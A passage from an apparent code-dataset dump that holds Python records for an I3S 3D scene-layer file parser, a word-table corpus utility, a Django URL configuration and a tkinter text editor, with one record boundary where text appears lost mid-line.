__init__(self,I3SFilePath):\r\n self.i3SPath=I3SFilePath\r\n # LayerInfo 图层信息\r\n layerInfoPath=os.path.join(self.i3SPath,'3dSceneLayer.json.gz')\r\n self.sceneLayerInfo=SceneLayerInfo(layerInfoPath)\r\n\r\n # nodesPath=os.path.join(self.i3SPath,'nodes')\r\n # self.nodes=I3SNode(nodesPath)\r\n # 根节点\r\n rootNodePath=os.path.join(self.i3SPath,r'nodes\\root\\3dNodeIndexDocument.json.gz')\r\n self.i3SRootNode=I3SRootNode(rootNodePath)\r\n\r\n # 元数据\r\n # metadataPath=os.path.join(self.i3SPath,'metadata.json')\r\n # self.metadata=Metadata(metadataPath)\r\n\r\n # 获得所有节点数据\r\n def GetI3SNotes(self):\r\n nodesPath=os.path.join(self.i3SPath,'nodes')\r\n i3SNotes=[]\r\n for root,dirs,files in os.walk(nodesPath):\r\n for item in dirs:\r\n if item!='root':\r\n i3SNotes.append(I3SNode(os.path.join(nodesPath,item,'3dNodeIndexDocument.json.gz')))\r\n break\r\n return i3SNotes\r\n \r\n\r\n \r\n # 根据ID查找Node\r\n # ID号\r\n # 返回值:note\r\n def FindNodebyID(self,id):\r\n nodePath=os.path.join(self.i3SPath,id)\r\n node=I3SNode(nodePath)\r\n return node\r\n\r\n# i3s元数据类\r\n# FilePath:I3S元数据文件路径\r\n# create by xp dt:20180802 \r\nclass Metadata():\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n metadatafile = open(self.filePath,'r',encoding='utf-8')\r\n file_content=metadatafile.read()\r\n self.metadataJson=json.loads(file_content)\r\n metadatafile.close()\r\n\r\n# SceneLayerInfo基本信息\r\n# 主要用来查询SceneLayer相关信息\r\n# FilePath:SceneLayerInfo文件路径\r\n# crateby xp dt:20180801\r\nclass SceneLayerInfo():\r\n # 初始化SceneLayerInfo\r\n # InputSceneLayerInfoFile:3dSceneLayer.json.gz 压缩包地址\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n sceneLayerFile=gzip.open(self.filePath,'rb')\r\n file_content=sceneLayerFile.read()\r\n 
self.sceneLayerJson=json.loads(file_content)\r\n        sceneLayerFile.close()\r\n    \r\n    # get the spatial reference\r\n    def GetSpatialReference(self):\r\n        return self.sceneLayerJson['spatialReference']\r\n    # get the scene layer JSON\r\n    def GetsceneLayerJson(self):\r\n        return self.sceneLayerJson\r\n    # set the spatial reference\r\n    # NewSR: target spatial reference\r\n    def SetSpatialReference(self, NewSR):\r\n        self.sceneLayerJson['spatialReference']=NewSR\r\n    \r\n    # get the layer extent\r\n    def GetLayerExtent(self):\r\n        return self.sceneLayerJson['store']['extent']\r\n    #add xupf: adjust the spatial index CRS links\r\n    def CRSindexChange(self,newwikd):\r\n        self.sceneLayerJson['store']['indexCRS']=\"http://www.opengis.net/def/crs/EPSG/0/\"+str(newwikd)\r\n        self.sceneLayerJson['store']['vertexCRS']=\"http://www.opengis.net/def/crs/EPSG/0/\"+str(newwikd)\r\n    #add xupf: adjust the normal reference frame\r\n    def normalReferenceFrame(self):\r\n        self.sceneLayerJson['store']['normalReferenceFrame']=\"vertex-reference-frame\"\r\n    # set the layer extent\r\n    # NewExtent: target extent\r\n    def SetLayerExtent(self, NewExtent):\r\n        self.sceneLayerJson['store']['extent']=NewExtent\r\n\r\n    # save the JSON back into the gz archive\r\n    def SaveJsonToGZ(self):\r\n        sceneLayerFile=gzip.open(self.filePath,'wb')\r\n        saveJson=json.dumps(self.sceneLayerJson)\r\n        sceneLayerFile.write(str.encode(saveJson))\r\n        sceneLayerFile.close() \r\n\r\n# I3S root node\r\n# FilePath: root node path\r\n# create by xp dt:20180801\r\nclass I3SRootNode():\r\n    def __init__(self,FilePath):\r\n        self.filePath=FilePath\r\n        rootFile=gzip.open(self.filePath,'rb')\r\n        file_content=rootFile.read()\r\n        self.rootJson=json.loads(file_content)\r\n        rootFile.close()\r\n    \r\n    # save the JSON back into the archive\r\n    def SaveJsonToGZ(self):\r\n        saveJson=json.dumps(self.rootJson)\r\n        rootFile=gzip.open(self.filePath,'wb')\r\n        rootFile.write(str.encode(saveJson))\r\n        rootFile.close()\r\n\r\n# I3S node\r\n# FilePath: node path\r\n# create by xp dt:20180801\r\nclass I3SNode():\r\n    def __init__(self,FilePath):\r\n        self.filePath=FilePath\r\n        nodeFile=gzip.open(self.filePath,'rb')\r\n        file_content=nodeFile.read()\r\n        self.i3SNodeJson=json.loads(file_content)\r\n        nodeFile.close()\r\n\r\n\r\n    # minimum bounding sphere\r\n    def GetMBS(self):\r\n        return self.i3SNodeJson['mbs']\r\n\r\n    # set the minimum bounding sphere\r\n    # NewMBS: target bounding sphere\r\n    def SetMBS(self,NewMBS):\r\n        self.i3SNodeJson['mbs']=NewMBS\r\n\r\n    # minimum oriented bounding box\r\n    def GetOBB(self):\r\n        if 'obb' in self.i3SNodeJson.keys() and self.i3SNodeJson['obb']:\r\n            return self.i3SNodeJson['obb']\r\n\r\n    # set the oriented bounding box\r\n    # NewOBB: target bounding box\r\n    def SetOBB(self,NewOBB):\r\n        self.i3SNodeJson['obb']=NewOBB\r\n\r\n    # get the parent node\r\n    def GetParentNode(self):\r\n        return self.i3SNodeJson['parentNode']\r\n\r\n    # set the parent node\r\n    # NewParentNode: target parent node\r\n    def SetParentNode(self,NewParentNode):\r\n        self.i3SNodeJson['parentNode']=NewParentNode\r\n\r\n    # get the child nodes\r\n    def GetChildrens(self):\r\n        childrenNode=[]\r\n        if 'children' in self.i3SNodeJson.keys() and self.i3SNodeJson['children']:\r\n            if len(self.i3SNodeJson['children'])>0:\r\n                rootNodePath=os.path.split(self.filePath)[0]\r\n                os.chdir(rootNodePath)\r\n                for childnode in self.i3SNodeJson['children']:\r\n                    fullPath=os.path.abspath(childnode['href'])\r\n                    nodePath=os.path.join(fullPath,'3dNodeIndexDocument.json.gz')\r\n                    childrenNode.append(I3SNode(nodePath))\r\n\r\n        return childrenNode\r\n\r\n    # set the child nodes\r\n    # newChildrens: new collection of child nodes\r\n    def SetChildrens(self,newChildrens):\r\n        self.i3SNodeJson['children']=newChildrens\r\n\r\n    # save the JSON back into the archive\r\n    def SaveJsonToGZ(self):\r\n        saveJson=json.dumps(self.i3SNodeJson)\r\n        nodeFile=gzip.open(self.filePath,'wb')\r\n        nodeFile.write(str.encode(saveJson))\r\n        nodeFile.close()\r\n\r\n    # get the attributeData reference paths\r\n    def GetAttributes(self):\r\n        
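# build one Attribute object per attributeData entry of this node\r\n        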
attributes=[]\r\n        if 'attributeData' in self.i3SNodeJson.keys() and self.i3SNodeJson['attributeData']:\r\n            for index in range(len(self.i3SNodeJson['attributeData'])):\r\n                attributes.append(self.GetAttribute(index))\r\n        return attributes\r\n\r\n    # get an attribute by index \r\n    # index: attribute index\r\n    def GetAttribute(self,index=0):\r\n        rootNodePath=os.path.split(self.filePath)[0]\r\n        os.chdir(rootNodePath)\r\n        gzPath=self.i3SNodeJson['attributeData'][index]['href']+'.bin.gz'\r\n        gzPath=os.path.abspath(gzPath)\r\n        attribute=Attribute(gzPath)\r\n        return attribute \r\n\r\n    # get the featureData references\r\n    def GetFeatures(self):\r\n        features=[]\r\n        if 'featureData' in self.i3SNodeJson.keys() and self.i3SNodeJson['featureData']:\r\n            for index in range(len(self.i3SNodeJson['featureData'])):\r\n                features.append(self.GetFeature(index))\r\n        return features\r\n\r\n    # get a Feature by index\r\n    # index: feature index\r\n    def GetFeature(self,index=0):\r\n        rootNodePath=os.path.split(self.filePath)[0]\r\n        os.chdir(rootNodePath)\r\n        gzPath=self.i3SNodeJson['featureData'][index]['href']+'.json.gz'\r\n        gzPath=os.path.abspath(gzPath)\r\n        feature=Features(gzPath)\r\n        return feature\r\n\r\n    # get the geometries\r\n    def GetGeometries(self):\r\n        geometries=[]\r\n        if 'geometryData' in self.i3SNodeJson.keys() and self.i3SNodeJson['geometryData']:\r\n            for index in range(len(self.i3SNodeJson['geometryData'])):\r\n                geometries.append(self.GetGeometry(index))\r\n        return geometries\r\n\r\n    # get a Geometry by index\r\n    # index: index\r\n    def GetGeometry(self,index=0):\r\n        rootNodePath=os.path.split(self.filePath)[0]\r\n        os.chdir(rootNodePath)\r\n        binPath=self.i3SNodeJson['geometryData'][index]['href']+'.bin.gz'\r\n        binPath=os.path.abspath(binPath)\r\n        rule=self.GetFeature(index).GeometryRule()\r\n        geometry=Geometry(binPath,rule)\r\n        return geometry\r\n\r\n    # get the shared resource (materials)\r\n    def GetShared(self):\r\n        rootNodePath=os.path.split(self.filePath)[0]\r\n        os.chdir(rootNodePath)\r\n        filePath=self.i3SNodeJson['sharedResource']['href']+'\\\\sharedResource.json.gz'\r\n        filePath=os.path.abspath(filePath)\r\n        shared=Shared(filePath)\r\n        return shared\r\n\r\n    # get the textures\r\n    # a small issue may show up here xupf\r\n    def GetTextures(self):\r\n        textures=[]\r\n        if 'textureData' in self.i3SNodeJson.keys() and self.i3SNodeJson['textureData']:\r\n            for index in range(len(self.i3SNodeJson['textureData'])):\r\n                textures.append(index)\r\n        return textures\r\n\r\n    # get a texture by index\r\n    # index: index\r\n    def GetTexture(self,index=0):\r\n        if 'textureData' in self.i3SNodeJson.keys() and self.i3SNodeJson['textureData']:\r\n            rootNodePath=os.path.split(self.filePath)[0]\r\n            os.chdir(rootNodePath)\r\n            binPath=self.i3SNodeJson['textureData'][index]['href']+'.bin'\r\n            binPath=os.path.abspath(binPath)\r\n            texture=Texture(binPath)\r\n            return texture\r\n    \r\n# Attribute class\r\n# FilePath: attribute file path\r\n# create by xp dt:20180802 \r\nclass Attribute():\r\n    def __init__(self,FilePath):\r\n        self.filePath=FilePath\r\n        attributeFile=gzip.open(self.filePath,'rb')\r\n        self.attributeFileBin=attributeFile.read()\r\n        attributeFile.close()\r\n\r\n    # save the attribute data back to the gz archive\r\n    def SaveBinToGZ(self):\r\n        with gzip.open(self.filePath,'wb') as wf:\r\n            wf.write(self.attributeFileBin)\r\n\r\n# Texture class\r\n# FilePath: texture file path\r\n# create by xp dt:20180802 \r\nclass Texture():\r\n    def __init__(self,FilePath):\r\n        \r\n        self.filePath=FilePath\r\n        # self.rules=Rules\r\n        textureFile=gzip.open(self.filePath,'rb')\r\n        self.textureBin=textureFile.read()\r\n        textureFile.close()\r\n\r\n    # save the texture back to the binary gz file\r\n    def SaveBinToGZ(self):\r\n        with 
gzip.open(self.filePath,'wb') as wf:\r\n            wf.write(self.textureBin)\r\n\r\n\r\n# FeatureData class\r\n# to be completed\r\n# create by xp dt:20180802 \r\nclass FeatureData():\r\n    def __init__(self):\r\n        self.id=-1\r\n        self.position=[]\r\n        self.pivotOffset=[]\r\n        self.mbb=[]\r\n        self.layer=''\r\n        self.geometries=None\r\n\r\n# Features class\r\n# FilePath: features file path\r\n# create by xp dt:20180802 \r\nclass Features():\r\n    def __init__(self,FilePath):\r\n        self.filePath=FilePath\r\n        featureFile=gzip.open(self.filePath,'r')\r\n        file_content=featureFile.read()\r\n        self.featureJson=json.loads(file_content)\r\n        featureFile.close()\r\n\r\n    # get all feature data; the id is the index of the element in the returned list\r\n    def featureDataArray(self):\r\n        return self.featureJson['featureData']\r\n    \r\n    # get an ID by index\r\n    # index: index\r\n    def GetID(self, index=0):\r\n        return self.featureJson['featureData'][index]['id']\r\n\r\n    # get a position by index\r\n    # index: index\r\n    def GetPosition(self,index=0):\r\n        return self.featureJson['featureData'][index]['position']\r\n\r\n    # update a position by index\r\n    # index: index\r\n    def SetPosition(self,NewPosition,index=0):\r\n        self.featureJson['featureData'][index]['position']=NewPosition\r\n    \r\n    # get the minimum bounding box by index\r\n    # index: index\r\n    def GetMbb(self,index=0):\r\n        return self.featureJson['featureData'][index]['mbb']\r\n\r\n    def SetMbb(self,NewMbb,index=0):\r\n        self.featureJson['featureData'][index]['mbb']=NewMbb\r\n\r\n    # get the geometryData array\r\n    def GeometryData(self):\r\n        return self.featureJson['geometryData']\r\n\r\n    # get a geometry transformation by index\r\n    # index: index\r\n    def GetGeometryTransformation(self,index=0):\r\n        return self.featureJson['geometryData'][index]['transformation']\r\n\r\n    # update a geometry transformation by index\r\n    # index: index\r\n    def SetGeometryTransformation(self,NewTransformation, index=0):\r\n        self.featureJson['geometryData'][index]['transformation']=NewTransformation\r\n\r\n    # get a geometry rule (vertexAttributes) by index\r\n    # index: index\r\n    def GeometryRule(self,index=0):\r\n        return self.featureJson['geometryData'][index]['params']['vertexAttributes']\r\n    # get a geometry rule (featureAttributes) by index\r\n    # index: index\r\n    #by xupf used for node geometry deletion/thinning operations\r\n    def GeometryRule1(self,index=0):\r\n        return self.featureJson['geometryData'][index]['params']['featureAttributes']\r\n    # save back to the gz archive\r\n    def SaveJsonToGZ(self):\r\n        saveJson=json.dumps(self.featureJson)\r\n        featureFile=gzip.open(self.filePath,'w')\r\n        featureFile.write(str.encode(saveJson))\r\n        featureFile.close()\r\n\r\n# Geometry class\r\n# FilePath: geometry file path\r\n# Rules: parsing rules\r\n# create by xp dt:20180802 \r\nclass Geometry():\r\n    def __init__(self,FilePath,Rules):\r\n        self.filePath=FilePath\r\n        self.rules=Rules\r\n        geometryFile=gzip.open(self.filePath,'rb')\r\n        self.geometryBin=geometryFile.read()\r\n        geometryFile.close()\r\n\r\n    \r\n    # # initialize positions, normals, UVs, colors\r\n    # def Init(self, parameter_list):\r\n    #     self.positionCollection=self.GetPositions()\r\n    #     self.normalCollection=self.GetPosition()\r\n    #     self.uv0Collection=self.GetPosition()\r\n    #     self.colorCollection=self.GetPosition()\r\n\r\n    # get all vertex positions\r\n    def GetPositions(self):\r\n        count=self.rules['position']['count']\r\n        i=0\r\n        positionCollection=[]\r\n        while (i')\n        self.add_word('')\n\n    def load(self, path1, path2):\n        with open(path1, 'rb') as f:\n            self.word2id = pickle.load(f)\n        with open(path2, 'rb') as f:\n            self.id2word = pickle.load(f)\n    \n    def add_word(self, word):\n        if word not in self.word2id: # add the word if the word-to-index mapping does not contain it yet\n            self.word2id[word] = self.id\n            self.id2word[self.id] = word \n            self.id += 1\n\n\nclass Corpus(object):\n    def __init__(self, datapath):\n        self.wordTable = WordTable() \n        self.path = datapath\n        
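# the entire corpus file is read into memory up front; this appears fine for the small per-task datasets this script targets (assumption)\n        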
with open(self.path, 'r') as f:\n            self.data = f.readlines()\n        \n    def get_data(self):\n        \n        tokens = 0\n        for line in self.data: \n            words = line.split() + [''] \n            tokens += len(words)\n            for word in words:\n                self.wordTable.add_word(word) \n    \n    def get_vector(self, id, seqlen=10):\n        words = self.data[id].split()\n        x = []\n        y = []\n        for word in words:\n            x.append(self.wordTable.word2id[word])\n        \n        y = x.copy()\n        y.pop(0)\n        y.append(self.wordTable.word2id[''])\n        \n        tmp = [0 for i in range(seqlen)]\n        x += tmp\n        y += tmp\n        x = x[:seqlen]\n        y = y[:seqlen]\n\n        return np.array(x), np.array(y)\n\n    def get_words(self, vec):\n        ret = []\n        for idx in vec:\n            if idx in self.wordTable.id2word:\n                ret.append(self.wordTable.id2word[idx])\n            else:\n                ret.append('')\n        return ret\n\n    \n    ","sub_path":"task4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"549895302","text":"from django.urls import re_path, path\n\nfrom . import views\n\napp_name = \"posts\"\n\nurlpatterns = [\n    path('', views.AllPosts.as_view(), name=\"all\"),\n    path('new/', views.CreatePost.as_view(), name=\"create\"),\n    re_path(\n        r\"by/(?P<username>[-\\w]+)/$\",\n        views.UserPosts.as_view(),\n        name=\"for_user\"\n    ),\n    re_path(\n        r\"by/(?P<username>[-\\w]+)/(?P<pk>\\d+)/$\",\n        views.SinglePost.as_view(),\n        name=\"single\"\n    ),\n    re_path(\n        r\"delete/(?P<pk>\\d+)/$\",\n        views.DeletePost.as_view(),\n        name=\"delete\"\n    ),\n]\n","sub_path":"msg/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"22689732","text":"import tkinter as tk\r\nimport tkinter.ttk as ttk\r\nfrom tkinter import filedialog\r\nfrom tkinter import messagebox\r\nfrom keyword import kwlist\r\nfrom types import FunctionType\r\nfrom PIL import ImageTk, Image\r\nimport pyperclip\r\nimport json\r\nimport os\r\nimport re\r\n# colors\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\nred = (255, 0, 0)\r\ngreen = (0, 255, 0)\r\nblue = (0, 0, 255)\r\n# style of the Editor\r\nwindowWidth = 800\r\nwindowHeight = 800\r\neditorWidth = 50\r\neditorHeight = 50\r\nroot = tk.Tk()\r\n# root.title('Fox-editor')\r\n# mainFrame\r\nroot.option_add('*tearOff', tk.FALSE)\r\nroot.configure(background='grey')\r\nletters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'  # string.ascii_letters would also work\r\ns = 0\r\ndef putIntoDict(path=''):\r\n    if path=='':\r\n        path = filedialog.askdirectory()\r\n    A = {}\r\n    B = os.listdir(path)\r\n    for i in B:\r\n        if os.path.isdir(os.path.join(path, i)):\r\n            A[i] = putIntoDict(path=os.path.join(path, i))\r\n        else:\r\n            A[i] = os.path.normpath(os.path.join(path, i))\r\n    return A\r\n\t# dicti = {}\r\n\t# for i in val:\r\n\t# \tif type(val[i]) is dict:\r\n\t# \t\tdicti[i] = putIntoDict(val[i])\r\n\t# \telse:\r\n\t# \t\tdicti[i] = val[i]\r\n\t# return dicti\r\ndef isText(filePath):\r\n    bytes = open(filePath, 'rb').read(1024)\r\n    return not bool(bytes.translate(None, bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f})))\r\n\r\nsettings = {}\r\nclass Editor(ttk.Notebook):\r\n    def __init__(self, frame=root):\r\n        super().__init__(frame)\r\n        self.enable_traversal()\r\n        self.pack(fill=tk.BOTH, expand=True)\r\n        self.editorTabs = []\r\n        self.editorTabFrames = []\r\n        self.editorFiles = []\r\n        self.history = []\r\n        self.isSaved = []\r\n        # with open(os.path.split(os.path.realpath(__file__))[0]+'\\\\data.json', 'r+') as data_file:\r\n        #     settings = 
eval(json.loads(data_file.read()))\r\n\r\nclass Menubar(tk.Menu):\r\n    def __init__(self, frame=root):\r\n        super().__init__(frame)\r\n\r\n        self.file = tk.Menu(self)\r\n        self.edit = tk.Menu(self)\r\n        self.view = tk.Menu(self)\r\n\r\n        self.add_cascade(menu=self.file, label='File')\r\n        self.add_cascade(menu=self.edit, label='Edit')\r\n        self.add_cascade(menu=self.view, label='View')\r\n\r\nclass ContextMenu(tk.Menu):\r\n    def __init__(self, frame=root):\r\n        super().__init__(frame)\r\n\r\nclass FileViewer(ttk.Treeview):\r\n    def __init__(self, frame=root):\r\n        super().__init__(frame)\r\n        self.pack(side=tk.LEFT, expand=False, fill=tk.BOTH)\r\n        self.projectFolders = {}\r\n        self.tempFolders = {}\r\n\r\nclass SideTool(ttk.Frame):\r\n    def __init__(self, frame=root):\r\n        super().__init__(frame)\r\n        self.pack(side=tk.LEFT, expand=False, fill=tk.BOTH)\r\n\r\nclass Application(tk.Frame):\r\n    def __init__(self, master=root):\r\n        super().__init__(master)\r\n\r\n        self.focus_set()\r\n\r\n        self.pack()\r\n        self.SAVE = 0\r\n        self.SAVE_AS = 1\r\n\r\n        self.OPEN_FILE = 0\r\n        self.OPEN_FOLDER_TEMP = 1\r\n        self.OPEN_FOLDER_PROJECT = 2\r\n\r\n        self.OPEN_NEW_DOCUMENT_TAB = 0\r\n        self.OPEN_FILE_TAB = 1\r\n        self.OPEN_FILE_TAB_BINARY = 2\r\n        self.OPEN_HELP_TAB = 3\r\n        self.OPEN_SETTING_TAB = 4\r\n\r\n        self.FILE_CONTEXT_MENU = 0 # when you click on a file in the file viewer\r\n        self.FOLDER_CONTEXT_MENU = 1 # when you click on a folder in the file viewer\r\n        self.TEXT_CONTEXT_MENU = 2 # when you click on the text in a tab\r\n        self.TAB_CONTEXT_MENU = 3 # when you click on the tab\r\n        self.FILEVIEWER_CONTEXT_MENU = 4 # when you click on the fileviewer without clicking on a folder or file\r\n        self.EDITOR_CONTEXT_MENU = 5\r\n\r\n        self.RENAME_FILE = 0\r\n        self.DELETE_FILE = 1\r\n        self.COPY_FILE_PATH = 2\r\n        self.ENTER_THIS_DIRECTORY = 3 # set the current working directory to this folder\r\n\r\n        self.TAB_HELP = 0\r\n        self.TAB_SETTINGS = 1\r\n        self.TAB_BINARY = 2\r\n\r\n        self.create_widgets()\r\n\r\n    def create_widgets(self):\r\n        self.menu = Menubar()\r\n\r\n        self.menu.file.add_command(label='New', command=self.newFile)\r\n        self.menu.file.add_command(label='Open file', command=lambda : self.openFile(fileType=self.OPEN_FILE))\r\n        self.menu.file.add_command(label='Open Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_TEMP))\r\n        self.menu.file.add_command(label='Close', command=lambda: self.closeTab())\r\n        self.menu.file.add_command(label='Save', command=lambda : self.saveFile(saveType=self.SAVE))\r\n        self.menu.file.add_command(label='Save as', command=lambda : self.saveFile(saveType=self.SAVE_AS))\r\n        self.menu.file.add_command(label='Add Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_PROJECT))\r\n        self.menu.file.add_command(label='Copy full path', command=self.copyPath)\r\n        self.menu.file.add_command(label='Reopen last tab', command=self.reopenLastFile)\r\n        self.menu.add_command(label='Settings', command=lambda:self.openTab(tabType=self.OPEN_SETTING_TAB))\r\n\r\n        self.contextMenu = ContextMenu()\r\n\r\n        self.contextMenu.add_command(label='New', command=self.newFile)\r\n        self.contextMenu.add_command(label='Open file', command=lambda : self.openFile(fileType=self.OPEN_FILE))\r\n        self.contextMenu.add_command(label='Open Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_TEMP))\r\n        self.contextMenu.add_command(label='Close', command=lambda: self.closeTab())\r\n        self.contextMenu.add_command(label='Save', command=lambda : self.saveFile(saveType=self.SAVE))\r\n        
self.contextMenu.add_command(label='Save as', command=lambda : self.saveFile(saveType=self.SAVE_AS))\r\n        self.contextMenu.add_command(label='Add Folder', command=lambda : self.openFile(fileType=self.OPEN_FOLDER_PROJECT))\r\n        self.contextMenu.add_command(label='Copy full path', command=self.copyPath)\r\n        self.contextMenu.add_command(label='Reopen last tab', command=self.reopenLastFile)\r\n        self.contextMenu.add_command(label='Settings', command=lambda:self.openTab(tabType=self.OPEN_SETTING_TAB))\r\n\r\n        self.bindKeys()\r\n\r\n        self.fileviewer = FileViewer()\r\n        self.editor = Editor()\r\n        self.openTab()\r\n        root.config(menu=self.menu)\r\n        self.tool = SideTool()\r\n        if (root.tk.call('tk', 'windowingsystem')=='aqua'):\r\n            root.bind('<2>', self.onSelect)\r\n            root.bind('<Control-1>', self.onSelect)\r\n        else:\r\n            root.bind(\"<3>\", self.onSelect)\r\n        # def n(s, window):\r\n        #     def buttonPress():\r\n        #         s.openFile()\r\n        #         window.destroy()\r\n        #     button1 = tk.Button(window, text='openFile', command=buttonPress)\r\n        #     button1.pack()\r\n        # self.customDialog('hi', 'hello', n)\r\n\r\n    def openTab(self, index='len(self.editor.tabs())', name='untitled', tabType=0, path=''):\r\n        f = eval(index)\r\n        self.editor.editorTabFrames.insert(f, tk.Frame(self.editor))\r\n        self.editor.editorTabFrames[f].pack(fill=tk.BOTH, expand=True)\r\n        try:\r\n            self.editor.insert(f, self.editor.editorTabFrames[f], text=name)\r\n        except tk.TclError:\r\n            self.editor.add(self.editor.editorTabFrames[f], text=name)\r\n        if tabType==self.OPEN_NEW_DOCUMENT_TAB:\r\n            self.editor.editorTabs.insert(f, tk.Text(self.editor.editorTabFrames[f]))\r\n            self.editor.editorFiles.insert(f, None)\r\n            self.editor.isSaved.insert(f, True)\r\n        elif tabType==self.OPEN_FILE_TAB:\r\n            self.editor.editorTabs.insert(f, tk.Text(self.editor.editorTabFrames[f]))\r\n            print('added tab')\r\n            self.editor.isSaved.insert(f, True)\r\n            if path != '':\r\n                self.editor.editorTabs[f].insert('1.0', open(path).read())\r\n                self.editor.editorFiles.insert(f, path)\r\n            else:\r\n                path = filedialog.askopenfilename(title='Choose file')\r\n                self.editor.editorTabs[f].insert('1.0', open(path).read())\r\n                self.editor.editorFiles.insert(f, path)\r\n        elif tabType==self.OPEN_FILE_TAB_BINARY:\r\n            \"\"\"Open a binary file like an image\"\"\"\r\n            img=ImageTk.PhotoImage(Image.open(path))\r\n            self.editor.editorTabs.insert(f, tk.Label(self.editor.editorTabFrames[f], image=img))\r\n            self.editor.editorTabs[f].image = img  # keep a reference so the PhotoImage is not garbage-collected\r\n            self.editor.editorTabs[f].pack(side = \"bottom\", fill = \"both\", expand = \"yes\")\r\n            self.editor.editorFiles.insert(f, path)\r\n            self.editor.isSaved.insert(f, True)\r\n        elif tabType==self.OPEN_HELP_TAB:\r\n            self.editor.editorTabs.insert(f, tk.Label(self.editor.editorTabFrames[f]))\r\n            self.editor.editorFiles.insert(f, self.TAB_HELP)\r\n            self.editor.isSaved.insert(f, True)\r\n        elif tabType==self.OPEN_SETTING_TAB:\r\n            self.editor.editorTabs.insert(f, tk.Label(self.editor.editorTabFrames[f]))\r\n            self.editor.editorFiles.insert(f, self.TAB_SETTINGS)\r\n            self.editor.isSaved.insert(f, True)\r\n        else:\r\n            print('Error: index=', index, ' name=', name, ' type=', str(tabType), ' path=', path)\r\n            return\r\n        if (root.tk.call('tk', 'windowingsystem')=='aqua'):\r\n            root.bind('<2>', lambda e: self.onSelect(e))\r\n            root.bind('<Control-1>', lambda e: self.onSelect(e))\r\n        else:\r\n            root.bind(\"<3>\", lambda e: self.onSelect(e))\r\n        if not type(self.editor.editorTabs[f]) is int:\r\n            self.editor.editorTabs[f].pack(fill=tk.BOTH, expand=True)\r\n        def noSave(e):\r\n            if e.keysym in letters:\r\n                self.editor.isSaved[f] = False\r\n        if not type(self.editor.editorTabs[f]) is 
int:\r\n            self.editor.editorTabs[f].bind('<Key>', noSave)\r\n        self.editor.select(self.editor.tabs()[f])\r\n\r\n    def closeTab(self, tabIndex='self.editor.index(self.editor.select())'):\r\n\r\n        if type(tabIndex) is int:\r\n            index = tabIndex\r\n        else:\r\n            index = eval(tabIndex)\r\n        if messagebox.askokcancel(message='You are about to close \'%s\'. Do you want to close this window' % (self.editor.tab(self.editor.tabs()[index])['text']), parent=root):\r\n            if type(self.editor.editorFiles[index]) is str:\r\n                self.editor.history.append(self.editor.editorFiles[index])\r\n            if self.editor.editorFiles[index] is None:\r\n                if messagebox.askyesno(message='You are about to close \'%s\' without saving. Do you want to save \'%s\' as a file on your computer?' % (self.editor.tab(self.editor.tabs()[index])['text'], self.editor.tab(self.editor.tabs()[index])['text']), parent=root):\r\n                    self.saveAs(index)\r\n            elif not self.editor.isSaved[index]:\r\n                if messagebox.askyesno(message='You are about to close \'%s\' without saving. Do you want to save your changes to \'%s\'' % (self.editor.tab(self.editor.tabs()[index])['text'], self.editor.tab(self.editor.tabs()[index])['text']), parent=root):\r\n                    self.saveFile(tabIndex=index)\r\n            self.editor.editorTabs.remove(self.editor.editorTabs[index])\r\n            self.editor.forget(self.editor.editorTabFrames[index])\r\n            self.editor.editorTabFrames.remove(self.editor.editorTabFrames[index])\r\n            self.editor.editorFiles.remove(self.editor.editorFiles[index])\r\n            self.editor.isSaved = self.editor.isSaved[:index] + self.editor.isSaved[index+1 :]\r\n\r\n    def openFile(self, path='', fileType=0):\r\n        if fileType==self.OPEN_FILE and (os.path.isfile(path) or path == ''):\r\n            if path=='':\r\n                path = filedialog.askopenfilename(title='Choose file')\r\n            if path=='':\r\n                return\r\n            if isText(path):\r\n                self.openTab(name=os.path.split(path)[1], tabType=self.OPEN_FILE_TAB, path=path)\n            else:\n                self.openTab(name=os.path.split(path)[1], tabType=self.OPEN_FILE_TAB_BINARY, path=path)\n        elif fileType==self.OPEN_FOLDER_TEMP and (os.path.isdir(path) or path == ''):\n            if path=='':\n                path = filedialog.askdirectory(title='Choose file')\n            if path=='':\n                return\n            self.fileviewer.tempFolders[path] = putIntoDict(path)\n            self.updateFileviewer()\n        elif fileType==self.OPEN_FOLDER_PROJECT and (os.path.isdir(path) or path == ''):\n            if path=='':\n                path = filedialog.askdirectory(title='Choose file')\n            if path=='':\n                return\n            print('add a project folder for repeated use')\n        else:\n            print('Error: path=', path, ' type=', str(fileType))\n            return\n\n    def saveFile(self, tabIndex='self.editor.index(self.editor.select())', saveType=0):\r\n        if type(tabIndex) is int:\r\n            index = tabIndex\r\n        else:\r\n            index = eval(tabIndex)\r\n        if (type(self.editor.editorFiles[index]) is str) and saveType==self.SAVE:\r\n            open(self.editor.editorFiles[index], 'w+').write(self.editor.editorTabs[index].get('1.0', 'end -1 c'))\r\n            self.editor.isSaved[index] = True\r\n            print('saved')\r\n        elif saveType==self.SAVE_AS:\r\n            f = filedialog.asksaveasfilename()\r\n            if f == '':\r\n                return ''\r\n            # new, never-saved documents have no backing file yet, so there is nothing to type-check\r\n            if self.editor.editorFiles[index] is None or isText(self.editor.editorFiles[index]):\r\n                open(f, 'w+').write(self.editor.editorTabs[index].get('1.0', 'end -1 c'))\r\n                self.editor.editorFiles[index] = f\r\n                self.editor.isSaved[index] = True\r\n                self.editor.tab(self.editor.select(), text=os.path.split(f)[1])\r\n        else:\r\n            print('Error: index=', tabIndex, ' type=', str(saveType))\r\n            return\r\n\r\n    def saveAs(self, tabIndex='self.editor.index(self.editor.select())'):\r\n        self.saveFile(tabIndex=tabIndex, saveType=self.SAVE_AS)\r\n\r\n    def newFile(self):\r\n        print('new tab')\r\n        
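# a blank, unsaved document tab: its editorFiles entry stays None until the user saves it to disk\r\n        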
